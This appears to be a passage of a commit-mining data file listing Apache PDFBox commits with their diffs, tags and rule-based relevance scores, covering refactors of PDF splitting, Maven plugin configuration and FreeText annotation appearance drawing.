"a032a8f29dbb69b762b9fbf46e9c2d22fc142a42", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1528392302, - "hunks": 4, - "message": "PDFBOX-4071: simplify code git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1833129 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/tools/src/main/java/org/apache/pdfbox/tools/PDFSplit.java b/tools/src/main/java/org/apache/pdfbox/tools/PDFSplit.java", - "index fa01e52cd..310285817 100644", - "--- a/tools/src/main/java/org/apache/pdfbox/tools/PDFSplit.java", - "+++ b/tools/src/main/java/org/apache/pdfbox/tools/PDFSplit.java", - "@@ -20,3 +20,2 @@ import java.io.File;", - " import java.io.IOException;", - "-import java.io.FileOutputStream;", - "@@ -25,3 +24,2 @@ import java.util.List;", - " import org.apache.pdfbox.pdmodel.PDDocument;", - "-import org.apache.pdfbox.pdfwriter.COSWriter;", - " import org.apache.pdfbox.multipdf.Splitter;", - "@@ -172,4 +170,3 @@ public final class PDFSplit", - " {", - "- String fileName = outputPrefix + \"-\" + (i + 1) + \".pdf\";", - "- writeDocument(doc, fileName);", - "+ doc.save(outputPrefix + \"-\" + (i + 1) + \".pdf\");", - " }", - "@@ -193,11 +190,2 @@ public final class PDFSplit", - "- private static void writeDocument( PDDocument doc, String fileName ) throws IOException", - "- {", - "- try (FileOutputStream output = new FileOutputStream(fileName);", - "- COSWriter writer = new COSWriter(output))", - "- {", - "- writer.write(doc);", - "- }", - "- }", - "-", - " /**" - ], - "changed_files": [ - "tools/src/main/java/org/apache/pdfbox/tools/PDFSplit.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4071": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4071", - "relevance": 2 - } - ] - }, - { - "commit_id": "f8092d633c14e26b6f9015623a07de6524fd1880", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1532264250, - "hunks": 2, - "message": "PDFBOX-4271: no longer use the old plugin, as suggested by Karl Heinz Marbaise git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1836436 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/parent/pom.xml b/parent/pom.xml", - "index b664c95c8..2858e38ae 100644", - "--- a/parent/pom.xml", - "+++ b/parent/pom.xml", - "@@ -243,8 +243,2 @@", - " ", - "- ", - "- com.googlecode.maven-download-plugin", - "- ", - "- maven-download-plugin", - "- 1.1.0", - "- ", - " ", - "diff --git a/preflight/pom.xml b/preflight/pom.xml", - "index e1d566889..3e1318602 100644", - "--- a/preflight/pom.xml", - "+++ b/preflight/pom.xml", - "@@ -109,4 +109,3 @@", - " com.googlecode.maven-download-plugin", - "- ", - "- maven-download-plugin", - "+ download-maven-plugin", - " " - ], - "changed_files": [ - "parent/pom.xml", - "preflight/pom.xml" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4271": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4271", - "relevance": 2 - } - ] - }, - { - "commit_id": "1935ded739bd338450cddf24bb003b35d4d0228e", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1530725558, - "hunks": 19, - "message": "PDFBOX-3353: remove unneeded stroke(), unneeded rotation, unneeded /RD handling, use Adobe offsets for non-cloudy, adjust BBox and offsets and width when /RD is set git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1835073 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", - "index 071d9ce67..9904364b6 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", - "@@ -17,3 +17,2 @@ package org.apache.pdfbox.pdmodel.interactive.annotation.handlers;", - "-import java.awt.geom.AffineTransform;", - " import java.io.IOException;", - "@@ -125,3 +124,6 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", - " }", - "- cs.stroke();", - "+ if (pathsArray.length > 0)", - "+ {", - "+ cs.stroke();", - "+ }", - "@@ -156,5 +158,3 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", - "-", - "-", - "- //TODO this segment was copied from square handler. Refactor?", - "+ PDRectangle borderBox;", - " PDBorderEffectDictionary borderEffect = annotation.getBorderEffect();", - "@@ -162,2 +162,3 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", - " {", - "+ //TODO this segment was copied from square handler. Refactor?", - " CloudyBorder cloudyBorder = new CloudyBorder(cs,", - "@@ -168,3 +169,4 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", - " PDAppearanceStream appearanceStream = annotation.getNormalAppearanceStream();", - "- appearanceStream.setBBox(cloudyBorder.getBBox());", - "+ borderBox = cloudyBorder.getBBox();", - "+ appearanceStream.setBBox(borderBox);", - " appearanceStream.setMatrix(cloudyBorder.getMatrix());", - "@@ -179,6 +181,3 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", - " // border difference.", - "- // - if /RD is not set the border box is defined by the /Rect entry. The /RD entry will", - "- // be set to be the line width and the /Rect is enlarged by the /RD amount", - "-", - "- PDRectangle borderBox;", - "+ // - if /RD is not set then we don't touch /RD etc because Adobe doesn't either.", - " float[] rectDifferences = annotation.getRectDifferences();", - "@@ -186,13 +185,3 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", - " {", - "- borderBox = getPaddedRectangle(getRectangle(), ab.width/2);", - "- // the differences rectangle", - "- annotation.setRectDifferences(ab.width/2);", - "- annotation.setRectangle(addRectDifferences(getRectangle(), annotation.getRectDifferences()));", - "-", - "- // when the normal appearance stream was generated BBox and Matrix have been set to the", - "- // values of the original /Rect. As the /Rect was changed that needs to be adjusted too.", - "- annotation.getNormalAppearanceStream().setBBox(getRectangle());", - "- AffineTransform transform = AffineTransform.getTranslateInstance(-getRectangle().getLowerLeftX(),", - "- -getRectangle().getLowerLeftY());", - "- annotation.getNormalAppearanceStream().setMatrix(transform);", - "+ borderBox = getRectangle();", - " }", - "@@ -201,4 +190,5 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", - " borderBox = applyRectDifferences(getRectangle(), rectDifferences);", - "- borderBox = getPaddedRectangle(borderBox, ab.width/2);", - "+ annotation.getNormalAppearanceStream().setBBox(borderBox);", - " }", - "+ borderBox = getPaddedRectangle(borderBox, ab.width / 2);", - " cs.addRect(borderBox.getLowerLeftX(), borderBox.getLowerLeftY(),", - "@@ -214,3 +204,3 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", - " float yOffset;", - "- float width = rotation == 90 || rotation == 270 ? getRectangle().getHeight(): getRectangle().getWidth();", - "+ float width = rotation == 90 || rotation == 270 ? borderBox.getHeight(): borderBox.getWidth();", - " // somewhat inspired by AppearanceGeneratorHelper.insertGeneratedAppearance()", - "@@ -221,2 +211,3 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", - " {", - "+ //TODO cloudy needs to be reviewed too.", - " factor = 2;", - "@@ -224,2 +215,5 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", - " float fontSize = extractFontSize(annotation);", - "+ // used by Adobe, no idea where it comes from, actual font bbox max y is 0.931", - "+ // gathered by creating an annotation with width 0.", - "+ float yDelta = 0.7896f;", - " switch (rotation)", - "@@ -227,12 +221,12 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", - " case 180:", - "- xOffset = - getRectangle().getUpperRightX() + fontSize / 2 * factor; ", - "- yOffset = - getRectangle().getLowerLeftY() - font.getBoundingBox().getHeight() * fontSize / 1000 * factor;", - "+ xOffset = - borderBox.getUpperRightX() + ab.width * 2 * factor; ", - "+ yOffset = - borderBox.getLowerLeftY() - ab.width * 2 * factor - yDelta * fontSize * factor;", - " break;", - " case 90:", - "- xOffset = getRectangle().getLowerLeftY() + fontSize / 2 * factor;", - "- yOffset = - getRectangle().getLowerLeftX() - font.getBoundingBox().getHeight() * fontSize / 1000 * factor;", - "+ xOffset = borderBox.getLowerLeftY() + ab.width * 2 * factor;", - "+ yOffset = - borderBox.getLowerLeftX() - ab.width * 2 * factor - yDelta * fontSize * factor;", - " break;", - " case 270:", - "- xOffset = - getRectangle().getUpperRightY() + fontSize / 2 * factor;", - "- yOffset = getRectangle().getUpperRightX() - font.getBoundingBox().getHeight() * fontSize / 1000 * factor;", - "+ xOffset = - borderBox.getUpperRightY() + ab.width * 2 * factor;", - "+ yOffset = borderBox.getUpperRightX() - ab.width * 2 * factor - yDelta * fontSize * factor;", - " break;", - "@@ -240,4 +234,4 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", - " default:", - "- xOffset = getRectangle().getLowerLeftX() + fontSize / 2 * factor;", - "- yOffset = getRectangle().getUpperRightY() - font.getBoundingBox().getHeight() * fontSize / 1000 * factor;", - "+ xOffset = borderBox.getLowerLeftX() + ab.width * 2 * factor;", - "+ yOffset = borderBox.getUpperRightY() - ab.width * 2 * factor - yDelta * fontSize * factor;", - " break;", - "@@ -245,3 +239,3 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", - " cs.setFont(font, fontSize);", - "- cs.setNonStrokingColor(strokingColor);", - "+ cs.setNonStrokingColor(strokingColor.getComponents());", - " AppearanceStyle appearanceStyle = new AppearanceStyle();", - "@@ -252,3 +246,3 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", - " .text(new PlainText(annotation.getContents()))", - "- .width(width - fontSize / factor)", - "+ .width(width - ab.width * factor * 4)", - " .wrapLines(true)", - "@@ -285,3 +279,3 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", - " }", - "- // arrow length is 9 * width at about 30\u00c3\u0082\u00c2\u00b0 => 10 * width seems to be enough", - "+ // arrow length is 9 * width at about 30\u00c2\u00b0 => 10 * width seems to be enough", - " rect.setLowerLeftX(Math.min(minX - ab.width * 10, rect.getLowerLeftX()));" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "2b0381aa841d6094ade83ac1e73a175a8bb7bda4", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1530813788, - "hunks": 7, - "message": "PDFBOX-3353: support and use compression for long content streams git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1835166 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAppearanceContentStream.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAppearanceContentStream.java", - "index ca1a87077..f16140efa 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAppearanceContentStream.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAppearanceContentStream.java", - "@@ -46,2 +46,15 @@ public final class PDAppearanceContentStream extends PDAbstractContentStream imp", - "+ /**", - "+ * Create a new appearance stream.", - "+ *", - "+ * @param appearance The appearance stream to write to.", - "+ * @param compress whether the content stream is to be compressed. Set this to true when", - "+ * creating long content streams.", - "+ * @throws IOException If there is an error writing to the content stream.", - "+ */", - "+ public PDAppearanceContentStream(PDAppearanceStream appearance, boolean compress) throws IOException", - "+ {", - "+ this(appearance, appearance.getStream().createOutputStream(compress ? COSName.FLATE_DECODE : null));", - "+ }", - "+", - " /**", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", - "index 1300770d9..8ac1250f8 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", - "@@ -128,3 +128,21 @@ public abstract class PDAbstractAppearanceHandler implements PDAppearanceHandler", - " PDAppearanceEntry appearanceEntry = getNormalAppearance();", - "- return getAppearanceEntryAsContentStream(appearanceEntry);", - "+ return getAppearanceEntryAsContentStream(appearanceEntry, false);", - "+ }", - "+ ", - "+ /**", - "+ * Get the annotations normal appearance content stream.", - "+ * ", - "+ *

    ", - "+ * This will get the annotations normal appearance content stream,", - "+ * to 'draw' to.", - "+ * ", - "+ * @param compress whether the content stream is to be compressed. Set this to true when", - "+ * creating long content streams.", - "+ * @return the appearance entry representing the normal appearance.", - "+ * @throws IOException", - "+ */", - "+ PDAppearanceContentStream getNormalAppearanceAsContentStream(boolean compress) throws IOException", - "+ {", - "+ PDAppearanceEntry appearanceEntry = getNormalAppearance();", - "+ return getAppearanceEntryAsContentStream(appearanceEntry, compress);", - " }", - "@@ -208,5 +226,7 @@ public abstract class PDAbstractAppearanceHandler implements PDAppearanceHandler", - " * Get a rectangle enlarged by the differences.", - "- * ", - "- *

    Creates a new rectangle with differences added to each side.", - "- * .", - "+ *", - "+ *

    ", - "+ * Creates a new rectangle with differences added to each side. If there are no valid", - "+ * differences, then the original rectangle is returned.", - "+ *", - " * @param rectangle the rectangle.", - "@@ -230,5 +250,7 @@ public abstract class PDAbstractAppearanceHandler implements PDAppearanceHandler", - " * Get a rectangle with the differences applied to each side.", - "- * ", - "- *

    Creates a new rectangle with differences added to each side.", - "- * .", - "+ *", - "+ *

    ", - "+ * Creates a new rectangle with differences added to each side. If there are no valid", - "+ * differences, then the original rectangle is returned.", - "+ *", - " * @param rectangle the rectangle.", - "@@ -470,3 +492,4 @@ public abstract class PDAbstractAppearanceHandler implements PDAppearanceHandler", - "- private PDAppearanceContentStream getAppearanceEntryAsContentStream(PDAppearanceEntry appearanceEntry) throws IOException", - "+ private PDAppearanceContentStream getAppearanceEntryAsContentStream(", - "+ PDAppearanceEntry appearanceEntry, boolean compress) throws IOException", - " {", - "@@ -483,3 +506,3 @@ public abstract class PDAbstractAppearanceHandler implements PDAppearanceHandler", - "- return new PDAppearanceContentStream(appearanceStream);", - "+ return new PDAppearanceContentStream(appearanceStream, compress);", - " }", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", - "index b9e0c9771..e18d76100 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", - "@@ -79,3 +79,3 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", - "- try (PDAppearanceContentStream cs = getNormalAppearanceAsContentStream())", - "+ try (PDAppearanceContentStream cs = getNormalAppearanceAsContentStream(true))", - " {" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAppearanceContentStream.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "54c2a7af40a6247588a80712b704f657c61825a1", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1527335890, - "hunks": 12, - "message": "PDFBOX-3353: draw the box git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1832305 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", - "index 3e1b2edf7..6cd839ea9 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", - "@@ -17,2 +17,3 @@ package org.apache.pdfbox.pdmodel.interactive.annotation.handlers;", - "+import java.awt.geom.AffineTransform;", - " import java.io.IOException;", - "@@ -23,2 +24,3 @@ import org.apache.pdfbox.pdmodel.common.PDRectangle;", - " import org.apache.pdfbox.pdmodel.graphics.color.PDColor;", - "+import org.apache.pdfbox.pdmodel.graphics.color.PDDeviceGray;", - " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotation;", - "@@ -26,2 +28,4 @@ import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationFreeText;", - " import static org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationLine.LE_NONE;", - "+import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceStream;", - "+import org.apache.pdfbox.pdmodel.interactive.annotation.PDBorderEffectDictionary;", - " import static org.apache.pdfbox.pdmodel.interactive.annotation.handlers.PDAbstractAppearanceHandler.SHORT_STYLES;", - "@@ -50,3 +54,2 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", - " PDAnnotationFreeText annotation = (PDAnnotationFreeText) getAnnotation();", - "- PDRectangle rect = annotation.getRectangle();", - " float[] pathsArray = new float[0];", - "@@ -62,33 +65,22 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", - " PDColor color = annotation.getColor();", - "- if (color == null || color.getComponents().length == 0 || Float.compare(ab.width, 0) == 0)", - "+", - "+ // width 0 = no border", - "+ // pdf_commenting_new.pdf page 3", - "+ // Root/Pages/Kids/[2]/Kids/[0]/Annots/[5]/BS/W", - "+ if (Float.compare(ab.width, 0) == 0)", - " {", - "+ //TODO what happens if there is a callout?", - "+ //TODO skip, don't return when we know how to make text", - "+ // (maybe refactor the rectangle drawing segment)", - " return;", - " }", - "-", - "- if (pathsArray.length > 0)", - "+ if (color == null || color.getComponents().length == 0)", - " {", - "- // Adjust rectangle even if not empty", - "- // CTAN-example-Annotations.pdf p1", - "- //TODO in a class structure this should be overridable", - "- float minX = Float.MAX_VALUE;", - "- float minY = Float.MAX_VALUE;", - "- float maxX = Float.MIN_VALUE;", - "- float maxY = Float.MIN_VALUE;", - "- for (int i = 0; i < pathsArray.length / 2; ++i)", - "- {", - "- float x = pathsArray[i * 2];", - "- float y = pathsArray[i * 2 + 1];", - "- minX = Math.min(minX, x);", - "- minY = Math.min(minY, y);", - "- maxX = Math.max(maxX, x);", - "- maxY = Math.max(maxY, y);", - "- }", - "- // arrow length is 9 * width at about 30\u00c3\u0082\u00c2\u00b0 => 10 * width seems to be enough", - "- rect.setLowerLeftX(Math.min(minX - ab.width * 10, rect.getLowerLeftX()));", - "- rect.setLowerLeftY(Math.min(minY - ab.width * 10, rect.getLowerLeftY()));", - "- rect.setUpperRightX(Math.max(maxX + ab.width * 10, rect.getUpperRightX()));", - "- rect.setUpperRightY(Math.max(maxY + ab.width * 10, rect.getUpperRightY()));", - "- annotation.setRectangle(rect);", - "+ //TODO remove this when we've managed to parse /DA", - "+ color = new PDColor(new float[]{0}, PDDeviceGray.INSTANCE);", - " }", - "+ //TODO how to set the text color? Apparently red is the default????", - "+", - "+", - " try (PDAppearanceContentStream cs = getNormalAppearanceAsContentStream())", - "@@ -99,3 +91,3 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", - "- // in reality, Adobe uses the non stroking color from /DA as stroking color. WTF?", - "+ //TODO Adobe uses the last non stroking color from /DA as stroking color. WTF????", - " boolean hasStroke = cs.setStrokingColorOnDemand(color);", - "@@ -107,2 +99,90 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", - "+", - "+", - "+ //TODO this segment was copied from square handler. Refactor?", - "+ PDBorderEffectDictionary borderEffect = annotation.getBorderEffect();", - "+ if (borderEffect != null && borderEffect.getStyle().equals(PDBorderEffectDictionary.STYLE_CLOUDY))", - "+ {", - "+ CloudyBorder cloudyBorder = new CloudyBorder(cs,", - "+ borderEffect.getIntensity(), ab.width, getRectangle());", - "+ cloudyBorder.createCloudyRectangle(annotation.getRectDifference());", - "+ annotation.setRectangle(cloudyBorder.getRectangle());", - "+ annotation.setRectDifference(cloudyBorder.getRectDifference());", - "+ PDAppearanceStream appearanceStream = annotation.getNormalAppearanceStream();", - "+ appearanceStream.setBBox(cloudyBorder.getBBox());", - "+ appearanceStream.setMatrix(cloudyBorder.getMatrix());", - "+ }", - "+ else", - "+ {", - "+ // handle the border box", - "+ //", - "+ // There are two options. The handling is not part of the PDF specification but", - "+ // implementation specific to Adobe Reader", - "+ // - if /RD is set the border box is the /Rect entry inset by the respective", - "+ // border difference.", - "+ // - if /RD is not set the border box is defined by the /Rect entry. The /RD entry will", - "+ // be set to be the line width and the /Rect is enlarged by the /RD amount", - "+", - "+ PDRectangle borderBox;", - "+ float[] rectDifferences = annotation.getRectDifferences();", - "+ if (rectDifferences.length == 0)", - "+ {", - "+ borderBox = getPaddedRectangle(getRectangle(), ab.width/2);", - "+ // the differences rectangle", - "+ annotation.setRectDifferences(ab.width/2);", - "+ annotation.setRectangle(addRectDifferences(getRectangle(), annotation.getRectDifferences()));", - "+", - "+ // when the normal appearance stream was generated BBox and Matrix have been set to the", - "+ // values of the original /Rect. As the /Rect was changed that needs to be adjusted too.", - "+ annotation.getNormalAppearanceStream().setBBox(getRectangle());", - "+ AffineTransform transform = AffineTransform.getTranslateInstance(-getRectangle().getLowerLeftX(),", - "+ -getRectangle().getLowerLeftY());", - "+ annotation.getNormalAppearanceStream().setMatrix(transform);", - "+ }", - "+ else", - "+ {", - "+ borderBox = applyRectDifferences(getRectangle(), rectDifferences);", - "+ borderBox = getPaddedRectangle(borderBox, ab.width/2);", - "+ }", - "+ cs.addRect(borderBox.getLowerLeftX(), borderBox.getLowerLeftY(),", - "+ borderBox.getWidth(), borderBox.getHeight());", - "+ }", - "+ cs.drawShape(ab.width, hasStroke, hasBackground);", - "+", - "+", - "+", - "+ if (pathsArray.length > 0)", - "+ {", - "+ PDRectangle rect = getRectangle();", - "+", - "+ // Adjust rectangle", - "+ // important to do this after the rectangle has been painted, because the", - "+ // final rectangle will be bigger due to callout", - "+ // CTAN-example-Annotations.pdf p1", - "+ //TODO in a class structure this should be overridable", - "+ float minX = Float.MAX_VALUE;", - "+ float minY = Float.MAX_VALUE;", - "+ float maxX = Float.MIN_VALUE;", - "+ float maxY = Float.MIN_VALUE;", - "+ for (int i = 0; i < pathsArray.length / 2; ++i)", - "+ {", - "+ float x = pathsArray[i * 2];", - "+ float y = pathsArray[i * 2 + 1];", - "+ minX = Math.min(minX, x);", - "+ minY = Math.min(minY, y);", - "+ maxX = Math.max(maxX, x);", - "+ maxY = Math.max(maxY, y);", - "+ }", - "+ // arrow length is 9 * width at about 30\u00c3\u0082\u00c2\u00b0 => 10 * width seems to be enough", - "+ rect.setLowerLeftX(Math.min(minX - ab.width * 10, rect.getLowerLeftX()));", - "+ rect.setLowerLeftY(Math.min(minY - ab.width * 10, rect.getLowerLeftY()));", - "+ rect.setUpperRightX(Math.max(maxX + ab.width * 10, rect.getUpperRightX()));", - "+ rect.setUpperRightY(Math.max(maxY + ab.width * 10, rect.getUpperRightY()));", - "+ annotation.setRectangle(rect);", - "+ ", - "+ // need to set the BBox too, because rectangle modification came later", - "+ annotation.getNormalAppearanceStream().setBBox(getRectangle());", - "+ }", - "+", - "+ // draw callout line(s)", - " for (int i = 0; i < pathsArray.length / 2; ++i)", - "@@ -152,5 +232,2 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", - " }", - "- ", - "- //TODO display border and text", - "- // how to set the text color? Apparently red is the default.", - " }" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "fedc93c03356383d9b57ae0c39244aa6d2c11bab", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1528051147, - "hunks": 5, - "message": "PDFBOX-3353: draw text box git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1832782 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", - "index ebd7eb35c..96c3f4c6a 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", - "@@ -25,2 +25,3 @@ import org.apache.pdfbox.cos.COSArray;", - " import org.apache.pdfbox.cos.COSBase;", - "+import org.apache.pdfbox.cos.COSNumber;", - " import org.apache.pdfbox.cos.COSObject;", - "@@ -29,2 +30,4 @@ import org.apache.pdfbox.pdmodel.PDAppearanceContentStream;", - " import org.apache.pdfbox.pdmodel.common.PDRectangle;", - "+import org.apache.pdfbox.pdmodel.font.PDFont;", - "+import org.apache.pdfbox.pdmodel.font.PDType1Font;", - " import org.apache.pdfbox.pdmodel.graphics.color.PDColor;", - "@@ -39,2 +42,5 @@ import org.apache.pdfbox.pdmodel.interactive.annotation.PDBorderEffectDictionary", - " import static org.apache.pdfbox.pdmodel.interactive.annotation.handlers.PDAbstractAppearanceHandler.SHORT_STYLES;", - "+import org.apache.pdfbox.pdmodel.interactive.annotation.layout.AppearanceStyle;", - "+import org.apache.pdfbox.pdmodel.interactive.annotation.layout.PlainText;", - "+import org.apache.pdfbox.pdmodel.interactive.annotation.layout.PlainTextFormatter;", - " import org.apache.pdfbox.util.Matrix;", - "@@ -193,2 +199,31 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", - "+ // somewhat inspired by AppearanceGeneratorHelper.insertGeneratedAppearance()", - "+ cs.beginText();", - "+ PDFont font = PDType1Font.HELVETICA;", - "+ int factor = 1;", - "+ if (borderEffect != null && borderEffect.getStyle().equals(PDBorderEffectDictionary.STYLE_CLOUDY))", - "+ {", - "+ factor = 2;", - "+ }", - "+ float fontSize = extractFontSize(annotation);", - "+ cs.setFont(font, fontSize);", - "+ cs.setNonStrokingColor(strokingColor);", - "+ AppearanceStyle appearanceStyle = new AppearanceStyle();", - "+ appearanceStyle.setFont(font);", - "+ appearanceStyle.setFontSize(fontSize);", - "+ PlainTextFormatter formatter = new PlainTextFormatter.Builder(cs)", - "+ .style(appearanceStyle)", - "+ .text(new 